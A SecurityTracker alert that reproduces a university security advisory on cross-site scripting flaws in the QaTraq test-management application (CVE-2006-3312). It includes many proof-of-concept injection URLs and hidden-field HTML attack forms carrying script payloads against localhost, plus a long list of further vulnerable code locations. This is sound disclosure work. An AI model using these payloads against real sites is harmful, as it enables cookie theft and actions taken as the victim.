SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


Try our Premium Alert Service
 
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service





Category:   Application (Generic)  >   QaTraq Vendors:   testmanagement.com
QaTraq Input Validation Hole Permits Cross-Site Scripting Attacks
SecurityTracker Alert ID:  1016381
SecurityTracker URL:  http://securitytracker.com/id/1016381
CVE Reference:   CVE-2006-3312   (Links to External Site)
Updated:  Aug 14 2006
Original Entry Date:  Jun 26 2006
Impact:   Disclosure of authentication information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): 6.5 RC and prior versions
Description:   A vulnerability was reported in QaTraq. A remote user can conduct cross-site scripting attacks.

Numerous scripts do not properly filter HTML code from user-supplied input before displaying the input. A remote user can create a specially crafted URL that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running the QaTraq software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

It may be possible to inject SQL commands, as well.

The original advisory is available at:

http://www.seclab.tuwien.ac.at/advisories/TUVSA-0606-001.txt

Nenad Jovanovic of the Secure Systems Lab at the Technical University of Vienna reported this vulnerability.

Impact:   A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the QaTraq software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.
Solution:   The vendor has issued a fixed version (6.8 RC).
Vendor URL:  sourceforge.net/projects/qatraq/ (Links to External Site)
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  QaTraq 6.5 RC: Multiple XSS Vulnerabilities

===========================================================

QaTraq 6.5 RC: Multiple XSS Vulnerabilities

===========================================================

Technical University of Vienna Security Advisory

TUVSA-0606-001, June 23, 2006

===========================================================



Affected applications

----------------------


QaTraq (http://sourceforge.net/projects/qatraq/)


Versions 6.5 RC and prior.



Description

------------


There are a number of reflected XSS vulnerabilities, some of which are also stored XSS vulnerabilities and perhaps even SQL injection
 vulnerabilitities. The affected program points as well as demo exploits are given below. The exploits have been tested with the user
 being logged in as admin, and register_globals being active. It is possible that some vulnerabilities do not require register_globals
 to be enabled, although we have not tested this. Some of the parameters in the given sample exploits (mainly "id" params) have to
 be adjusted to the given installation to match existing database entries.


In addition to program points for which exploits are given, we have listed about 200 places that are very similar in structure. Although
 we have not explicitly tested them with exploits, we suspect that they are vulnerable as well. 


top.inc

---------


line 1005

http://localhost/qatraq65rc/queries_view_search.php?link_print='"><script>alert('hi')</script>


line 1007

http://localhost/qatraq65rc/queries_view_search.php?link_upgrade='"><script>alert('hi')</script>


line 1020

http://localhost/qatraq65rc/queries_view_search.php?link_sql='"><script>alert('hi')</script>


line 1041

http://localhost/qatraq65rc/queries_view_search.php?link_next="><script>alert('hi')</script>


line 1054

http://localhost/qatraq65rc/queries_view_search.php?link_prev="><script>alert('hi')</script>


line 1067

http://localhost/qatraq65rc/queries_view_search.php?link_list="><script>alert('hi')</script>



components_copy_content.php

-----------------------------


line 233

http://localhost/qatraq65rc/components_copy_content.php?product_id=1&id=1&msg=<script>alert('hi')</script>

[product_id and id (= component id) must exist in the database]


line 238

- use the attack page:

<form method="post" action="http://localhost/qatraq65rc/components_copy_content.php?product_id=1&id=1">

<input type="hidden" name="page_action" value="save"/>

<input type="hidden" name="component_name" value='"><script>alert("hi")</script>'/>

<input type="submit"/>

</form>


line 260

- analogous to 238:

<form method="post" action="http://localhost/qatraq65rc/components_copy_content.php?product_id=1&id=1">

<input type="hidden" name="page_action" value="save"/>

<input type="hidden" name="component_name" value='some_new_name'/>

<input type="hidden" name="component_desc" value='</textarea><script>alert("hi")</script>'/>

<input type="submit"/>

</form>



components_modify_content.php

-------------------------------


line 213

http://localhost/qatraq65rc/components_modify_content.php?product_id=1&id=1&msg=<script>alert('hi')</script>


line 218

<form method="post" action="http://localhost/qatraq65rc/components_modify_content.php?product_id=1&id=1">

<input type="hidden" name="page_action" value="save"/>

<input type="hidden" name="component_name" value='"><script>alert("hi")</script>'/>

<input type="submit"/>

</form>


line 240

<form method="post" action="http://localhost/qatraq65rc/components_modify_content.php?product_id=1&id=1">

<input type="hidden" name="page_action" value="save"/>

<input type="hidden" name="component_name" value='some_new_name'/>

<input type="hidden" name="component_desc" value='</textarea><script>alert("hi")</script>'/>

<input type="submit"/>

</form>



components_new_content.php

-----------------------------


line 188

http://localhost/qatraq65rc/components_new_content.php?product_id=1&id=1&msg=<script>alert('hi')</script>


line 193

<form method="post" action="http://localhost/qatraq65rc/components_new_content.php?product_id=1&id=1">

<input type="hidden" name="page_action" value="save"/>

<input type="hidden" name="component_name" value='"><script>alert("hi")</script>'/>

<input type="submit"/>

</form>


line 215

<form method="post" action="http://localhost/qatraq65rc/components_new_content.php?product_id=1&id=1">

<input type="hidden" name="page_action" value="save"/>

<input type="hidden" name="component_name" value='another_new_name'/>

<input type="hidden" name="component_desc" value='</textarea><script>alert("hi")</script>'/>

<input type="submit"/>

</form>



design_copy_content.php

-------------------------


line 262

- use this page [plan_id must exist in the database]:

<form method="post" action="http://localhost/qatraq65rc/design_copy_content.php?id=777&plan_id=1">

<input type="hidden" name="page_action" value="save"/>

<input type="hidden" name="title" value='"><script>alert("hi")</script>'/>

<input type="submit"/>

</form>


line 276

<form method="post" action="http://localhost/qatraq65rc/design_copy_content.php?id=777&plan_id=1">

<input type="hidden" name="page_action" value="save"/>

<input type="hidden" name="version" value='<script>alert("hi")</script>'/>

<input type="submit"/>

</form>


line 313

<form method="post" action="http://localhost/qatraq65rc/design_copy_content.php?id=777&plan_id=1">

<input type="hidden" name="page_action" value="save"/>

<input type="hidden" name="content" value='</textarea><script>alert("hi")</script>'/>

<input type="submit"/>

</form>



design_copy_plan_search.php

-----------------------------


line 106

<form method="post" action="http://localhost/qatraq65rc/design_copy_plan_search.php?id=777&plan_id=1">

<input type="hidden" name="page_action" value="save"/>

<input type="hidden" name="plan_title" value='"><script>alert("hi")</script>'/>

<input type="submit"/>

</form>


line 107

<form method="post" action="http://localhost/qatraq65rc/design_copy_plan_search.php?id=777&plan_id=1">

<input type="hidden" name="page_action" value="save"/>

<input type="hidden" name="plan_content" value='"><script>alert("hi")</script>'/>

<input type="submit"/>

</form>


design_modify_content.php

---------------------------


line 282

<form method="post" action="http://localhost/qatraq65rc/design_modify_content.php?id=1&plan_id=1">

<input type="hidden" name="page_action" value="save"/>

<input type="hidden" name="title" value='"><script>alert("hi")</script>'/>

<input type="submit"/>

</form>


line 298

- $new_doc_id is constructed from $major_version and $minor_version on line 189; these two are only set if POST['version_increment']
 is set; use this page [and watch for suitable id]:

<form method="post" action="http://localhost/qatraq65rc/design_modify_content.php?id=7">

<input type="hidden" name="page_action" value="save"/>

<input type="hidden" name="minor_version" value='<script>alert("hi")</script>'/>

<input type="submit"/>

</form>


line 311

- $new_version, analogous to 298


line 354

<form method="post" action="http://localhost/qatraq65rc/design_modify_content.php?id=10">

<input type="hidden" name="page_action" value="save"/>

<input type="hidden" name="content" value='</textarea><script>alert("hi")</script>'/>

<input type="submit"/>

</form>


design_new_content.php

------------------------


line 226

<form method="post" action="http://localhost/qatraq65rc/design_new_content.php?id=777&plan_id=1">

<input type="hidden" name="page_action" value="save"/>

<input type="hidden" name="title" value='"><script>alert("hi")</script>'/>

<input type="submit"/>

</form>


line 240

<form method="post" action="http://localhost/qatraq65rc/design_new_content.php?id=777&plan_id=1">

<input type="hidden" name="page_action" value="save"/>

<input type="hidden" name="version" value='<script>alert("hi")</script>'/>

<input type="submit"/>

</form>


line 276

<form method="post" action="http://localhost/qatraq65rc/design_new_content.php?id=777&plan_id=1">

<input type="hidden" name="page_action" value="save"/>

<input type="hidden" name="content" value='</textarea><script>alert("hi")</script>'/>

<input type="submit"/>

</form>


design_new_search.php

-----------------------


line 99

http://localhost/qatraq65rc/design_new_search.php?plan_name="><script>alert('hi')</script>


line 100

http://localhost/qatraq65rc/design_new_search.php?plan_desc="><script>alert('hi')</script>


download.php

-------------


line 31

http://localhost/qatraq65rc/download.php?file_name=<script>alert('hi')</script>


login.php

----------


line 88

http://localhost/qatraq65rc/login.php?username="><script>alert('hi')</script>


line 98

http://localhost/qatraq65rc/login.php?password="><script>alert('hi')</script>


phase_copy_content.php

------------------------


line 245

<form method="post" action="http://localhost/qatraq65rc/phase_copy_content.php?id=777&plan_id=1">

<input type="hidden" name="page_action" value="save"/>

<input type="hidden" name="title" value='"><script>alert("hi")</script>'/>

<input type="submit"/>

</form>


line 259

<form method="post" action="http://localhost/qatraq65rc/phase_copy_content.php?id=777&plan_id=1">

<input type="hidden" name="page_action" value="save"/>

<input type="hidden" name="version" value='<script>alert("hi")</script>'/>

<input type="submit"/>

</form>


line 285

<form method="post" action="http://localhost/qatraq65rc/phase_copy_content.php?id=777&plan_id=1">

<input type="hidden" name="page_action" value="save"/>

<input type="hidden" name="content" value='</textarea><script>alert("hi")</script>'/>

<input type="submit"/>

</form>


phase_delete_search.php

-------------------------


line 176

<form method="post" action="http://localhost/qatraq65rc/phase_delete_search.php">

<input type="hidden" name="page_action" value="search"/>

<input type="hidden" name="content" value='"><script>alert("hi")</script>'/>

<input type="submit"/>

</form>


phase_modify_content.php

--------------------------


line 273

<form method="post" action="http://localhost/qatraq65rc/phase_modify_content.php?id=2&plan_id=1">

<input type="hidden" name="page_action" value="save"/>

<input type="hidden" name="title" value='"><script>alert("hi")</script>'/>

<input type="submit"/>

</form>


line 289

<form method="post" action="http://localhost/qatraq65rc/phase_modify_content.php?id=2">

<input type="hidden" name="page_action" value="save"/>

<input type="hidden" name="minor_version" value='<script>alert("hi")</script>'/>

<input type="submit"/>

</form>


line 302

- $new_version, analogous to 289


line 335

<form method="post" action="http://localhost/qatraq65rc/phase_modify_content.php?id=2">

<input type="hidden" name="page_action" value="save"/>

<input type="hidden" name="content" value='</textarea><script>alert("hi")</script>'/>

<input type="submit"/>

</form>


phase_modify_search.php

------------------------


line 177

<form method="post" action="http://localhost/qatraq65rc/phase_modify_search.php">

<input type="hidden" name="page_action" value="search"/>

<input type="hidden" name="content" value='"><script>alert("hi")</script>'/>

<input type="submit"/>

</form>


phase_new_content.php

----------------------


line 209

<form method="post" action="http://localhost/qatraq65rc/phase_new_content.php?id=777&plan_id=1">

<input type="hidden" name="page_action" value="save"/>

<input type="hidden" name="title" value='"><script>alert("hi")</script>'/>

<input type="submit"/>

</form>


line 223

<form method="post" action="http://localhost/qatraq65rc/phase_new_content.php?id=777&plan_id=1">

<input type="hidden" name="page_action" value="save"/>

<input type="hidden" name="version" value='<script>alert("hi")</script>'/>

<input type="submit"/>

</form>


line 252

<form method="post" action="http://localhost/qatraq65rc/phase_new_content.php?id=777&plan_id=1">

<input type="hidden" name="page_action" value="save"/>

<input type="hidden" name="content" value='</textarea><script>alert("hi")</script>'/>

<input type="submit"/>

</form>


phase_view_search.php

----------------------


line 176

<form method="post" action="http://localhost/qatraq65rc/phase_view_search.php">

<input type="hidden" name="page_action" value="search"/>

<input type="hidden" name="content" value='"><script>alert("hi")</script>'/>

<input type="submit"/>

</form>


products_copy_content.php

---------------------------


line 175

http://localhost/qatraq65rc/products_copy_content.php?product_id=1&id=1&msg=<script>alert('hi')</script>


line 180

<form method="post" action="http://localhost/qatraq65rc/products_copy_content.php?product_id=1&id=1">

<input type="hidden" name="page_action" value="save"/>

<input type="hidden" name="product_name" value='"><script>alert("hi")</script>'/>

<input type="submit"/>

</form>


line 185

<form method="post" action="http://localhost/qatraq65rc/products_copy_content.php?product_id=1&id=1">

<input type="hidden" name="page_action" value="save"/>

<input type="hidden" name="product_name" value='some_new_name'/>

<input type="hidden" name="product_desc" value='</textarea><script>alert("hi")</script>'/>

<input type="submit"/>

</form>



Other suspicious places (without exploits)

---------------------------------------------


- products_copy_search.php, line 116, $product_name

- products_copy_search.php, line 117, $product_desc

- products_delete_search.php, line 116, $product_name

- products_delete_search.php, line 117, $product_desc

- products_modify_content.php, line 186, $msg

- products_modify_content.php, line 191, $product_name

- products_modify_content.php, line 196, $product_desc

- products_modify_search.php, line 116, $product_name

- products_modify_search.php, line 117, $product_desc

- products_new_content.php, line 157, $msg

- products_new_content.php, line 162, $product_name

- products_new_content.php, line 167, $product_desc

- products_view_search.php, line 116, $product_name

- products_view_search.php, line 117, $product_desc

- queries_copy_content.php, line 182, $msg

- queries_copy_content.php, line 195, $title

- queries_copy_content.php, line 227, $description

- queries_copy_search.php, line 154, $title

- queries_copy_search.php, line 155, $id

- queries_copy_search.php, line 170, $description

- queries_delete_search.php, line 152, $title

- queries_delete_search.php, line 153, $id

- queries_delete_search.php, line 167, $description

- queries_modify_content.php, line 247, $msg

- queries_modify_content.php, line 260, $title

- queries_modify_content.php, line 292, $description

- queries_modify_content.php, line 308, $query

- queries_modify_search.php, line 152, $title

- queries_modify_search.php, line 153, $id

- queries_modify_search.php, line 167, $description

- queries_new_content.php, line 162, $msg

- queries_new_content.php, line 174, $title

- queries_new_content.php, line 222, $query

- queries_view_search.php, line 156, $title

- queries_view_search.php, line 157, $id

- queries_view_search.php, line 172, $description

- reports_copy_content.php, line 202, $msg

- reports_copy_content.php, line 215, $title

- reports_copy_content.php, line 247, $description

- reports_copy_content.php, line 255, $tmt

- reports_copy_search.php, line 147, $title

- reports_copy_search.php, line 148, $id

- reports_delete_search.php, line 148, $title

- reports_delete_search.php, line 149, $id

- reports_modify_content.php, line 266, $msg

- reports_modify_content.php, line 279, $title

- reports_modify_content.php, line 311, $description

- reports_modify_content.php, line 319, $query  $tmt

- reports_modify_search.php, line 148, $title

- reports_modify_search.php, line 149, $id

- reports_new_content.php, line 162, $msg

- reports_new_content.php, line 174, $title

- reports_new_content.php, line 190, $report_type

- reports_new_content.php, line 206, $description

- reports_new_content.php, line 214, $query  $tmt

- reports_view_content.php, line 187, $tmt 

- reports_view_content.php, line 194, $results

- reports_view_search.php, line 147, $title

- reports_view_search.php, line 148, $id

- reports_view_search.php, line 147, $title

- reports_view_search.php, line 148, $id

- requ_copy_content.php, line 217, $title

- requ_copy_content.php, line 252, $url

- requ_copy_content.php, line 274, $content

- requ_modify_content.php, line 209, $title

- requ_modify_content.php, line 244, $url

- requ_modify_content.php, line 266, $content

- requ_new_content.php, line 185, $title

- requ_new_content.php, line 214, $url

- requ_new_content.php, line 237, $content

- requ_new_search.php, line 99, $product_name

- requ_new_search.php, line 100, $product_desc

- results_modify_multiple.php, line 657, -> includes/ui.inc, line 116

- results_modify_multiple.php, line 395, $msg

- results_modify_search.php, line 182, $content

- results_modify_single.php, line 429, $msg

- results_modify_single.php, line 850, $TestDate

- results_view_multiple.php, line 125, $msg

- results_view_search.php, line 182, $content

- results_view_single.php, line 164, $msg

- roles_copy_content.php, line 190, $msg

- roles_copy_content.php, line 195, $role_name

- roles_copy_content.php, line 200, $role_desc

- roles_copy_search.php, line 117, $role_name

- roles_copy_search.php, line 118, $role_desc

- roles_delete_search.php, line 118, $role_name

- roles_delete_search.php, line 119, $role_desc

- roles_modify_content.php, line 203, $msg

- roles_modify_content.php, line 208, $role_name

- roles_modify_content.php, line 213, $role_desc

- roles_modify_search.php, line 118, $role_name

- roles_modify_search.php, line 119, $role_desc

- roles_new_content.php, line 172, $msg

- roles_new_content.php, line 177, $role_name

- roles_new_content.php, line 182, $role_desc

- roles_view_search.php, line 118, $role_name

- roles_view_search.php, line 119, $role_desc

- test_cases_copy_content.php, line 357, -> includes/ui.inc, line 198, $base_url

- test_cases_copy_content.php, line 289, $title

- test_cases_copy_content.php, line 303, $version

- test_cases_copy_content.php, line 382, $content

- test_cases_modify_content.php, line 383, $title

- test_cases_modify_content.php, line 399, $new_doc_id

- test_cases_modify_content.php, line 412, $new_version

- test_cases_modify_content.php, line 486, $content

- test_cases_modify_content.php, line 536, $filter_title

- test_cases_modify_content.php, line 537, $filter_tsc_id

- test_cases_new_content.php, line 341, $title

- test_cases_new_content.php, line 355, $version

- test_cases_new_content.php, line 431, $content

- test_cases_new_content.php, line 481, $filter_title

- test_cases_new_content.php, line 482, $filter_tsc_id

- test_cases_new_search.php, line 99, $product_name

- test_cases_new_search.php, line 100, $product_desc

- test_cases_view_content.php, line 302, $filter_tsc_id

- test_plans_copy_content.php, line 274, $title

- test_plans_copy_content.php, line 292, $version

- test_plans_copy_content.php, line 344, $content

- test_plans_modify_content.php, line 306, $title

- test_plans_modify_content.php, line 322, $new_doc_id

- test_plans_modify_content.php, line 339, $new_version

- test_plans_modify_content.php, line 398, $content

- test_plans_new_content.php, line 240, $title

- test_plans_new_content.php, line 258, $version

- test_plans_new_content.php, line 313, $content

- test_plans_new_search.php, line 96, $project_name

- test_plans_new_search.php, line 97, $project_desc

- test_scripts_copy_content.php, line 354, $title

- test_scripts_copy_content.php, line 368, $version

- test_scripts_copy_content.php, line 500, $content

- test_scripts_copy_design_search.php, line 100, $design_title

- test_scripts_copy_search.php, line 180, $content

- test_scripts_delete_search.php, line 182, $content

- test_scripts_include_cases_search.php, line 417, -> includes/ui.inc, line 34, $table_name

- test_scripts_include_cases_search.php, line 1068, -> includes/ui.inc, line 34, $table_name

- test_scripts_include_cases_search.php, line 875, -> includes/ui.inc, line 198, $base_url

- test_scripts_include_cases_search.php, line 427, $msg

- test_scripts_include_cases_search.php, line 576, $test_script[Title]

- test_scripts_include_cases_search.php, line 798, $tc_msg

- test_scripts_include_cases_search.php, line 809, $tc_title

- test_scripts_include_cases_search.php, line 823, $tc_version

- test_scripts_include_cases_search.php, line 1074, $row[Title]

- test_scripts_include_cases_search.php, line 1084, $row

- test_scripts_include_cases_search.php, line 1087, $row 

- test_scripts_include_cases_search.php, line 1096, $row[DocumentID]

- test_scripts_include_cases_search.php, line 1105, $row[ID]

- test_scripts_include_cases_search.php, line 1106, $row[ID]

- test_scripts_include_cases_search.php, line 1108, $row[ID]

- test_scripts_include_cases_search.php, line 1109, $row[ID]

- test_scripts_include_cases_search.php, line 1118, $row 

- test_scripts_include_cases_search.php, line 1124, $row  $ordering 

- test_scripts_include_search.php, line 163, $content

- test_scripts_modify_content.php, line 404, $title

- test_scripts_modify_content.php, line 420, $new_doc_id

- test_scripts_modify_content.php, line 433, $new_version

- test_scripts_modify_content.php, line 581, $content

- test_scripts_modify_content.php, line 726, $ordering_

- test_scripts_modify_search.php, line 181, $content

- test_scripts_new_content.php, line 293, $title

- test_scripts_new_content.php, line 307, $version

- test_scripts_new_content.php, line 426, $content

- test_scripts_new_search.php, line 93, $design_title

- test_scripts_remove_cases_search.php, line 375, -> includes/ui.inc, line 34, $table_name

- test_scripts_remove_cases_search.php, line 138, -> includes/ui.inc, line 34, $table_name

- test_scripts_remove_cases_search.php, line 148, $msg

- test_scripts_remove_cases_search.php, line 256, $test_script[Title]

- test_scripts_remove_cases_search.php, line 381, $row[Title]

- test_scripts_remove_cases_search.php, line 387, $is_selected  $row

- test_scripts_remove_cases_search.php, line 393, $row[DocumentID]

- test_scripts_remove_cases_search.php, line 405, $row[Ordering]

- test_scripts_remove_cases_search.php, line 423, $row[Title]

- test_scripts_remove_search.php, line 165, $content

- test_scripts_view_search.php, line 182, $content

- upload.php, line 51

- users_copy_content.php, line 249, $msg

- users_copy_content.php, line 254, $login_name

- users_copy_content.php, line 258, $user_name

- users_copy_content.php, line 263, $user_password

- users_copy_search.php, line 129, $login_name

- users_copy_search.php, line 130, $user_name

- users_copy_search.php, line 131, $default_role

- users_delete_content.php, line 146, $msg

- users_delete_search.php, line 129, $login_name

- users_delete_search.php, line 130, $user_name

- users_delete_search.php, line 131, $default_role

- users_modify_content.php, line 463, -> includes/ui.inc, line 116, $arr_table_vals[table_multi_display_line.$i]

- users_modify_content.php, line 385, $msg

- users_modify_content.php, line 394, $user_name

- users_modify_content.php, line 399, $user_password

- users_modify_search.php, line 127, $login_name

- users_modify_search.php, line 128, $user_name

- users_modify_search.php, line 129, $default_role

- users_new_content.php, line 233, $msg

- users_new_content.php, line 238, $login_name

- users_new_content.php, line 242, $user_name

- users_new_content.php, line 247, $user_password

- users_new_content.php, line 251, $user_password2

- users_view_content.php, line 138, $msg

- users_view_search.php, line 129, $login_name

- users_view_search.php, line 130, $user_name

- users_view_search.php, line 131, $default_role

- versions_copy_content.php, line 370, $msg

- versions_copy_content.php, line 375, $version_name

- versions_copy_content.php, line 380, $version_desc

- versions_modify_content.php, line 345, $msg

- versions_modify_content.php, line 350, $version_name

- versions_modify_content.php, line 355, $version_desc

- versions_new_content.php, line 322, $msg

- versions_new_content.php, line 327, $version_name

- versions_new_content.php, line 332, $version_desc

- versions_new_content.php, line 339, $version_date



Solution

---------


The authors did not respond to our notification, so there is no official solution available yet.


Timeline:


June 2, 2006: Attempt to contact QaTraq developers via "ashmans at users dot sourceforge dot net" and "traq at users dot sourceforge
 dot net".


June 23, 2006: Advisory submission.



References

-----------


http://www.seclab.tuwien.ac.at/advisories/TUVSA-0606-001.txt



Nenad Jovanovic

Secure Systems Lab 

Technical University of Vienna 

www.seclab.tuwien.ac.at

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2018, SecurityGlobal.net LLC